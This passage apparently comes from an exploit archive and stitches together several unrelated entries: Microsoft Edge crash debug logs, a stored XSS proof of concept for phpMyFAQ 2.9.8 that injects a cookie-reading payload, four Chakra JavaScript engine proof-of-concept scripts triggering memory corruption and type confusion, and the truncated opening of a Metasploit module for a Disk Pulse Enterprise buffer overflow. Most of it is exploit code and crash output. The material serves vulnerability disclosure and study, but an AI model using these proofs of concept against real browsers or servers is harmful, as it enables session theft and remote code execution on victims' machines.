26 00000071`3ecfcbc0 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
27 00000071`3ecfd050 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
28 00000071`3ecfd150 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
29 00000071`3ecfd210 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2a 00000071`3ecfd370 00007ffa`c0cccdf1 user32!DispatchMessageWorker+0x1ac
2b 00000071`3ecfd3f0 00007ffa`c0ccc3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2c 00000071`3ecff640 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2d 00000071`3ecff760 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2e 00000071`3ecff790 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
2f 00000071`3ecff7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:010> r
rax=00000001afccb7d4 rbx=000001b7d669fd80 rcx=ffff000000000000
rdx=00000001afccb7d4 rsi=000001afce6556d0 rdi=000000713ecfb250
rip=00007ffac8dc23f7 rsp=000000713ecfb090 rbp=000000713ecfb141
r8=0000000000000000 r9=000001b7d8a94bd0 r10=0000000000000005
r11=000001b7d9ebcee0 r12=0000000000000003 r13=0001000000000004
r14=0000000000000004 r15=000001afce6556d0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
=========================================
Debug log 2 (with Page Heap on for MicrosoftEdgeCP.exe and MemGC disabled):
=========================================
(de8.13c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
0:010> k
# Child-SP RetAddr Call Site
00 00000091`94ffb2c0 00007ffa`c9569bb2 edgehtml!COptionsCollectionCacheItem::GetAt+0x51
01 00000091`94ffb2f0 00007ffa`c8dc0c51 edgehtml!CElementCollectionTypeOperations::GetOwnItem+0x122
02 00000091`94ffb330 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x181
03 00000091`94ffb410 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
04 00000091`94ffb470 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
05 00000091`94ffb500 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
06 00000091`94ffb560 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
07 00000091`94ffb5f0 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
08 00000091`94ffb630 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
09 00000091`94ffb6c0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
0a 00000091`94ffb720 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0b 00000091`94ffbad0 000001b6`4f600fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0c 00000091`94ffbb20 00007ffa`c8e77273 0x000001b6`4f600fb2
0d 00000091`94ffbb50 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0e 00000091`94ffbba0 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 00000091`94ffbc00 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
10 00000091`94ffbc50 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
11 00000091`94ffbce0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
12 00000091`94ffbd40 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
13 00000091`94ffc090 000001b6`4f600fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
14 00000091`94ffc0e0 00007ffa`c8e77273 0x000001b6`4f600fba
15 00000091`94ffc110 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
16 00000091`94ffc160 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
17 00000091`94ffc1c0 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
18 00000091`94ffc2b0 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
19 00000091`94ffc320 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
1a 00000091`94ffc3c0 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1b 00000091`94ffc450 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1c 00000091`94ffc4f0 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1d 00000091`94ffc540 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1e 00000091`94ffc580 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1f 00000091`94ffc700 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
20 00000091`94ffc780 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
21 00000091`94ffc8e0 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
22 00000091`94ffc910 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
23 00000091`94ffcbe0 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
24 00000091`94ffcc30 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
25 00000091`94ffcd40 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
26 00000091`94ffce00 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
27 00000091`94ffce30 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
28 00000091`94ffd2c0 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
29 00000091`94ffd3c0 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
2a 00000091`94ffd480 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2b 00000091`94ffd5e0 00007ffa`c0d2cdf1 user32!DispatchMessageWorker+0x1ac
2c 00000091`94ffd660 00007ffa`c0d2c3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2d 00000091`94fff8b0 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2e 00000091`94fff9d0 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2f 00000091`94fffa00 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
30 00000091`94fffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:010> r
rax=000001b652742fe0 rbx=0000000000000004 rcx=000001b64f877f30
rdx=0000000000000004 rsi=0000000000000000 rdi=000001b651ecffd0
rip=00007ffac96b1581 rsp=0000009194ffb2c0 rbp=000001b64f3bcc60
r8=0000000000000005 r9=000001b651ed9e50 r10=0000000000000005
r11=000001b65343ef20 r12=0000009194ffb370 r13=0001000000000004
r14=0000000000000000 r15=0000000000000004
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
0:010> !heap -p -a 000001b6`52742ff0
address 000001b652742ff0 found in
_DPH_HEAP_ROOT @ 1ae3fae1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
1b652a5fd68: 1b652742fe0 20 - 1b652742000 2000
00007ffae783fd99 ntdll!RtlDebugAllocateHeap+0x000000000003bf65
00007ffae782db7c ntdll!RtlpAllocateHeap+0x0000000000083fbc
00007ffae77a8097 ntdll!RtlpAllocateHeapInternal+0x0000000000000727
00007ffac9958547 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x0000000000010457
00007ffac96d1483 edgehtml!CImplAry::EnsureSizeWorker+0x0000000000000093
00007ffac9882261 edgehtml!CImplPtrAry::Append+0x0000000000000051
00007ffac9589543 edgehtml!CSelectElement::AppendOption+0x000000000000002f
00007ffac95892e1 edgehtml!CSelectElement::BuildOptionsCache+0x00000000000000e1
00007ffac9e7f044 edgehtml!CSelectElement::Morph+0x00000000000000d0
00007ffac9a4e7cf edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x00000000001066df
00007ffac9605f85 edgehtml!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x0000000000000255
00007ffac9605d23 edgehtml!NUMPROPPARAMS::SetNumberProperty+0x000000000000003b
00007ffac9605bda edgehtml!CBase::put_BoolHelper+0x000000000000004a
00007ffac9c6f1d1 edgehtml!CFastDOM::CHTMLSelectElement::Trampoline_Set_multiple+0x000000000000013d
00007ffac9916b55 edgehtml!CFastDOM::CHTMLSelectElement::Profiler_Set_multiple+0x0000000000000025
00007ffac8ce6d07 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000000000000177
00007ffac8dc2640 chakra!Js::LeaveScriptObject<1,1,0>::LeaveScriptObject<1,1,0>+0x0000000000000180
00007ffac8e62209 chakra!Js::JavascriptOperators::CallSetter+0x00000000000000a9
00007ffac8de7151 chakra!Js::CacheOperators::TrySetProperty<1,1,1,1,1,1,0,1>+0x00000000000002d1
00007ffac8de6ce6 chakra!Js::ProfilingHelpers::ProfiledStFld<0>+0x00000000000000d6
00007ffac8d89a70 chakra!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutT_ElementCP<Js::LayoutSizePolicy<0> > const >+0x0000000000000070
00007ffac8d8e800 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x0000000000000340
00007ffac8d8c852 chakra!Js::InterpreterStackFrame::Process+0x0000000000000142
00007ffac8d90920 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x00000000000004a0
00007ffac8d92065 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x0000000000000055
000001b64f600fb2 +0x000001b64f600fb2
=========================================
-->
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# CVE: CVE-2017-14618
1. Description
Cross-site scripting (XSS) vulnerability in inc/PMF/Faq.php in phpMyFAQ
through 2.9.8 allows remote attackers to inject arbitrary web script or
HTML via the Questions field in an "Add New FAQ" action.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14618
https://securityprince.blogspot.fr/2017/10/cve-2017-14618-phpmyfaq-298-cross-site.html
2. Proof of Concept
Steps to Reproduce:
1. Log in as a user with administrator privileges and open the affected link
"http://localhost/phpmyfaq/admin/?action=editentry" (the injection step
therefore needs an admin account; the stored payload then fires for any user
who views the FAQ, as steps 4-6 show)
2. Enter the <a onmouseover=alert(document.cookie)>xss link</a> in the
“Questions”
3. Save the FAQ
4. Login using any other user or simply click on the phpMyFAQ on the
top-right hand side of the web portal
5. Click on the latest FAQ added
6. Hover around the name "xss link"
3. Solution:
This vulnerability will be fixed in phpMyFAQ 2.9.9
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309
There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays an HTML document served by a slow HTTP server, part of the document may be rendered before the server has finished sending it, and some of its JavaScript may already run.
By making DOM modifications before the document has had a chance to fully load, followed by another set of DOM modifications after the page has loaded, it is possible to trigger memory corruption that could lead to an exploitable condition.
A debug log is included below. Note that the crash RIP directly precedes a (CFG-protected) indirect call - the value loaded at the faulting instruction feeds the call target - which is what demonstrates the exploitability of the issue.
Since a custom HTTP server is needed to demonstrate the issue, I'm attaching all of the required code. Simply run server.py and point Edge to http://127.0.0.1:8000/
Note: this has been tested on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393)
Debug log:
=========================================
(a68.9c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 000000eb`c42f8da0 00007ffa`9d8b243d edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa
01 000000eb`c42f8dd0 00007ffa`9d8b28e2 edgehtml!Collections::SGrowingArray<TSmartPointer<Tree::ANode,CStrongReferenceTraits> >::DeleteAt+0x89
02 000000eb`c42f8e00 00007ffa`9d8b0cd7 edgehtml!Undo::UndoNodeList::RemoveNodesCompletelyContained+0x5e
03 000000eb`c42f8e30 00007ffa`9d8ad79b edgehtml!Undo::WrapUnwrapNodeUndoUnit::RemoveNodesAtOldPosition+0x33
04 000000eb`c42f8e70 00007ffa`9d5b303d edgehtml!Undo::MoveForestUndoUnit::HandleWrapUnwrap+0x6b
05 000000eb`c42f8f10 00007ffa`9d8ac629 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa3fd
06 000000eb`c42f8f60 00007ffa`9d5b3085 edgehtml!Undo::ParentUndoUnit::ApplyScriptedOperationToChildren+0xb5
07 000000eb`c42f8ff0 00007ffa`9d11035c edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa445
08 000000eb`c42f9040 00007ffa`9d110125 edgehtml!Undo::UndoManager::ApplyScriptedOperationsToUserUnits+0x11c
09 000000eb`c42f9130 00007ffa`9d1d6f0d edgehtml!Undo::UndoManager::SubmitUndoUnit+0x125
0a 000000eb`c42f9170 00007ffa`9dc9c9ae edgehtml!CSelectionManager::CreateAndSubmitSelectionUndoUnit+0x141
0b 000000eb`c42f9200 00007ffa`9dc90b70 edgehtml!CRemoveFormatBaseCommand::PrivateExec+0xae
0c 000000eb`c42f92c0 00007ffa`9dc9057a edgehtml!CCommand::Exec+0xe8
0d 000000eb`c42f9350 00007ffa`9d55e481 edgehtml!CMshtmlEd::Exec+0x17a
0e 000000eb`c42f93b0 00007ffa`9d39cc34 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xa5841
0f 000000eb`c42f9470 00007ffa`9d21d6a1 edgehtml!CDoc::ExecHelper+0x5d18
10 000000eb`c42fb020 00007ffa`9d1dbb57 edgehtml!CDocument::Exec+0x41
11 000000eb`c42fb070 00007ffa`9d1dba25 edgehtml!CBase::execCommand+0xc7
12 000000eb`c42fb0f0 00007ffa`9d1db8ac edgehtml!CDocument::execCommand+0x105
13 000000eb`c42fb2e0 00007ffa`9d498155 edgehtml!CFastDOM::CDocument::Trampoline_execCommand+0x124
14 000000eb`c42fb3f0 00007ffa`9c930e37 edgehtml!CFastDOM::CDocument::Profiler_execCommand+0x25
15 000000eb`c42fb420 00007ffa`9c9e9073 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x177
16 000000eb`c42fb500 00007ffa`9c9596cd chakra!amd64_CallFunction+0x93
17 000000eb`c42fb560 00007ffa`9c95cec7 chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x15d
18 000000eb`c42fb600 00007ffa`9c960f52 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xa7
19 000000eb`c42fb680 00007ffa`9c95f1b2 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x132
1a 000000eb`c42fb710 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x142
1b 000000eb`c42fb770 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
1c 000000eb`c42fbad0 00000284`bf4b0fa2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
1d 000000eb`c42fbb20 00007ffa`9c9e9073 0x00000284`bf4b0fa2
1e 000000eb`c42fbb50 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
1f 000000eb`c42fbba0 00007ffa`9c95abc0 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
20 000000eb`c42fbc00 00007ffa`9c95f65d chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
21 000000eb`c42fbc50 00007ffa`9c95f217 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
22 000000eb`c42fbce0 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x1a7
23 000000eb`c42fbd40 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
24 000000eb`c42fc090 00000284`bf4b0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
25 000000eb`c42fc0e0 00007ffa`9c9e9073 0x00000284`bf4b0faa
26 000000eb`c42fc110 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
27 000000eb`c42fc160 00007ffa`9c98ce3c chakra!Js::JavascriptFunction::CallFunction<1>+0x83
28 000000eb`c42fc1c0 00007ffa`9c98c406 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
29 000000eb`c42fc2b0 00007ffa`9c9ce4d9 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
2a 000000eb`c42fc320 00007ffa`9c9928a1 chakra!ScriptSite::CallRootFunction+0xb5
2b 000000eb`c42fc3c0 00007ffa`9c98e45c chakra!ScriptSite::Execute+0x131
2c 000000eb`c42fc450 00007ffa`9d333b2d chakra!ScriptEngineBase::Execute+0xcc
2d 000000eb`c42fc4f0 00007ffa`9d333a78 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
2e 000000eb`c42fc540 00007ffa`9d35ac27 edgehtml!CJScript9Holder::ExecuteCallback+0x18
2f 000000eb`c42fc580 00007ffa`9d35aa17 edgehtml!CListenerDispatch::InvokeVar+0x1fb
30 000000eb`c42fc700 00007ffa`9d33247a edgehtml!CListenerDispatch::Invoke+0xdb
31 000000eb`c42fc780 00007ffa`9d415a62 edgehtml!CEventMgr::_InvokeListeners+0x2ca
32 000000eb`c42fc8e0 00007ffa`9d290715 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
33 000000eb`c42fc910 00007ffa`9d2901a3 edgehtml!CEventMgr::Dispatch+0x405
34 000000eb`c42fcbe0 00007ffa`9d37434a edgehtml!CEventMgr::DispatchEvent+0x73
35 000000eb`c42fcc30 00007ffa`9d3ac5a2 edgehtml!COmWindowProxy::Fire_onload+0x14e
36 000000eb`c42fcd40 00007ffa`9d3ab23e edgehtml!CMarkup::OnLoadStatusDone+0x376
37 000000eb`c42fce00 00007ffa`9d3aa72f edgehtml!CMarkup::OnLoadStatus+0x112
38 000000eb`c42fce30 00007ffa`9d328d93 edgehtml!CProgSink::DoUpdate+0x3af
39 000000eb`c42fd2c0 00007ffa`9d32a550 edgehtml!GlobalWndOnMethodCall+0x273
3a 000000eb`c42fd3c0 00007ffa`b7a31c24 edgehtml!GlobalWndProc+0x130
3b 000000eb`c42fd480 00007ffa`b7a3156c user32!UserCallWinProcCheckWow+0x274
3c 000000eb`c42fd5e0 00007ffa`9347d421 user32!DispatchMessageWorker+0x1ac
3d 000000eb`c42fd660 00007ffa`9347c9e1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
3e 000000eb`c42ff8b0 00007ffa`ad7e9586 EdgeContent!LCIETab_ThreadProc+0x2c1
3f 000000eb`c42ff9d0 00007ffa`b7978364 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
40 000000eb`c42ffa00 00007ffa`ba0a70d1 KERNEL32!BaseThreadInitThunk+0x14
41 000000eb`c42ffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:013> r
rax=00000284bc287fd8 rbx=00000284bc287f90 rcx=00000000abcdbbbb
rdx=0000000000000000 rsi=0000000000000017 rdi=0000000000000000
rip=00007ffa9d5f15ea rsp=000000ebc42f8da0 rbp=000000ebc42f8fb0
r8=0000000000000017 r9=000000ebc42f8e78 r10=00000fff53a47750
r11=0000000000010000 r12=0000027cb4fbcd10 r13=0000027cb4f95a78
r14=000000ebc42f8e70 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
0:013> u 00007ffa`9d5f15ea
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx]
00007ffa`9d5f15ed 488b80d0050000 mov rax,qword ptr [rax+5D0h]
00007ffa`9d5f15f4 ff15c654ab00 call qword ptr [edgehtml!_guard_dispatch_icall_fptr (00007ffa`9e0a6ac0)]
=========================================
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42758.zip
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1310
(function f(a = (function () {
print(a);
with ({});
})()) {
function g() {
f;
}
})();
When Chakra executes the above code, it doesn't generate bytecode for "g" - a feature called "DeferParse". The problem is that the bytecode generated for "f" with the feature enabled differs from the bytecode generated with it disabled, because "ByteCodeGenerator::ProcessScopeWithCapturedSym", which changes the function expression scope's type, is not called when the feature is enabled.
Here's a snippet of the method which emits an incorrect opcode.
void ByteCodeGenerator::LoadAllConstants(FuncInfo *funcInfo)
{
...
if (funcExprWithName)
{
if (funcInfo->GetFuncExprNameReference() ||
(funcInfo->funcExprScope && funcInfo->funcExprScope->GetIsObject()))
{
...
Js::RegSlot ldFuncExprDst = sym->GetLocation();
this->m_writer.Reg1(Js::OpCode::LdFuncExpr, ldFuncExprDst);
if (sym->IsInSlot(funcInfo))
{
Js::RegSlot scopeLocation;
AnalysisAssert(funcInfo->funcExprScope);
if (funcInfo->funcExprScope->GetIsObject())
{
scopeLocation = funcInfo->funcExprScope->GetLocation();
this->m_writer.Property(Js::OpCode::StFuncExpr, sym->GetLocation(), scopeLocation,
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
}
else if (funcInfo->bodyScope->GetIsObject())
{
this->m_writer.ElementU(Js::OpCode::StLocalFuncExpr, sym->GetLocation(),
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
}
else
{
Assert(sym->HasScopeSlot());
this->m_writer.SlotI1(Js::OpCode::StLocalSlot, sym->GetLocation(),
sym->GetScopeSlot() + Js::ScopeSlots::FirstSlotIndex);
}
}
...
}
}
...
}
As you can see, it only handles "funcExprScope->GetIsObject()" or "bodyScope->GetIsObject()" but not "paramScope->GetIsObject()".
Without the feature, there's no case that only "paramScope->GetIsObject()" returns true because "ByteCodeGenerator::ProcessScopeWithCapturedSym" for "f" is always called and makes "funcInfo->funcExprScope->GetIsObject()" return true.
But with the feature, the method is not called. So it ends up emitting an incorrect opcode "Js::OpCode::StLocalSlot".
The feature is enabled in Edge by default.
PoC:
-->
// PoC for the DeferParse bytecode mismatch described above. 'f' is a named
// function expression whose name is captured by the nested function 'g', so the
// generator has to store the function-expression symbol somewhere; with
// DeferParse on, ProcessScopeWithCapturedSym is skipped and the store is emitted
// as StLocalSlot against the wrong scope. The 'with' inside the default-value
// IIFE is presumably what makes the parameter scope an object scope - TODO confirm.
let h = function f(a0 = (function () {
    a0;
    a1;
    a2;
    a3;
    a4;
    a5;
    a6;
    a7 = 0x99999; // oob write
    with ({});
})(), a1, a2, a3, a4, a5, a6, a7) {
    function g() {
        f;
    }
};
// Call in a tight loop; the PoC does not say whether this is needed for the
// JIT tiers or merely to make the mis-emitted write observable - TODO confirm.
for (let i = 0; i < 0x10000; i++) {
    h();
}
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1326
In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. And there's a bug when it parses "eval" in a catch statement's param.
ParseNodePtr Parser::ParseCatch()
{
...
pnodeCatchScope = StartParseBlock<buildAST>(PnodeBlockType::Regular, isPattern ? ScopeType_CatchParamPattern : ScopeType_Catch);
...
ParseNodePtr pnodePattern = ParseDestructuredLiteral<buildAST>(tkLET, true /*isDecl*/, true /*topLevel*/, DIC_ForceErrorOnInitializer);
...
}
1. "pnodeCatchScope" is a temporary block used to create a scope, and it is not actually inserted into the AST.
2. If the parser meets "eval" in "ParseDestructuredLiteral", it calls "pnodeCatchScope->SetCallsEval".
3. But "pnodeCatchScope" is not inserted into the AST. So the bytecode generator doesn't know it calls "eval", and it can't create scopes properly.
PoC:
-->
// PoC for the catch-parameter eval bug described above: the direct eval in the
// destructuring default marks the temporary catch-scope block as calling eval,
// but that block is never inserted into the AST, so the bytecode generator
// sets up the surrounding scopes without knowing about the eval. 'g' capturing
// the block-scoped 'i' presumably forces a real scope for the outer block - TODO confirm.
function f() {
    {
        let i;
        function g() {
            i;
        }
        try {
            throw 1;
        } catch ({e = eval('dd')}) {
        }
    }
}
// A single invocation is enough: the defect is in parsing / bytecode generation for f, not in what f computes.
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1308
When Chakra's parser meets "{", it initially treats it as an object literal without distinguishing whether it will be an object literal (e.g., {a: 0x1234}) or an object pattern (e.g., {a} = {a: 1234}). After it has finished parsing the construct with "Parser::ParseTerm", if it turns out to be an object pattern, Chakra converts it using the "ConvertObjectToObjectPattern" method.
The problem is that "Parser::ParseTerm" also parses postfix operators such as "." via "ParsePostfixOperators" without proper checks. As a result, invalid syntax (e.g., {b = 0x1111...}.c) can be parsed, and "ConvertObjectToObjectPattern" fails to convert it to an object pattern.
In the following PoC, "ConvertObjectToObjectPattern" skips "{b = 0x1111...}.c". So the object literal will have incorrect members(b = 0x1111, c = 0x2222), this leads to type confusion(Chakra will think "c" is a setter and try to call it).
PoC:
-->
// PoC for the object-pattern conversion bug described above. The inner
// "{ b = 0x1111, c = 0x2222 }.c = 0x3333" is parsed as an object literal
// followed by a postfix member access, so ConvertObjectToObjectPattern skips
// it: the literal keeps b/c as members and Chakra later treats "c" as a
// setter and tries to call it (type confusion).
function f() {
    ({
        a: {
            b = 0x1111,
            c = 0x2222,
        }.c = 0x3333
    } = {});
}
// Running f executes the mis-converted destructuring and hits the setter-call type confusion described above.
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1327
Here's the method used to re-parse asmjs modules.
void JavascriptFunction::ReparseAsmJsModule(ScriptFunction** functionRef)
{
ParseableFunctionInfo* functionInfo = (*functionRef)->GetParseableFunctionInfo();
Assert(functionInfo);
functionInfo->GetFunctionBody()->AddDeferParseAttribute();
functionInfo->GetFunctionBody()->ResetEntryPoint();
functionInfo->GetFunctionBody()->ResetInParams();
FunctionBody * funcBody = functionInfo->Parse(functionRef);
#if ENABLE_PROFILE_INFO
// This is the first call to the function, ensure dynamic profile info
funcBody->EnsureDynamicProfileInfo();
#endif
(*functionRef)->UpdateUndeferredBody(funcBody);
}
First, it resets the function body and then re-parses it. But it doesn't consider that "functionInfo->Parse(functionRef);" may throw an exception, in which case the function body is left in its reset (invalid) state.
We can make it throw an exception simply by exhausting the stack.
PoC:
-->
// Minimal asm.js module: the 'use asm' directive is what routes this function
// through the asm.js (re)parse path described above.
function Module() {
    'use asm';
    function f() {
    }
    return f;
}
// Recurse until the stack is exhausted, then invoke Module from the catch
// handler with almost no stack left: the re-parse inside ReparseAsmJsModule
// throws partway through, leaving the already-reset function body invalid.
// The argument 1 is presumably what forces the asm.js link to fail and fall
// back to re-parsing - TODO confirm.
function recur() {
    try {
        recur();
    } catch (e) {
        Module(1);
    }
}
// Kick off the stack-exhausting recursion described above.
recur();
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
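class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Disk Pulse Enterprise GET Buffer Overflow',
      'Description'    => %q(
        This module exploits an SEH buffer overflow in Disk Pulse Enterprise
        9.9.16. If a malicious user sends a crafted HTTP GET request
        it is possible to execute a payload that would run under the Windows
        NT AUTHORITY\SYSTEM account.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Chance Johnson',                    # msf module - albatross@loftwing.net
          'Nipun Jaswal & Anurag Srivastava'   # Original discovery -- www.pyramidcyber.com
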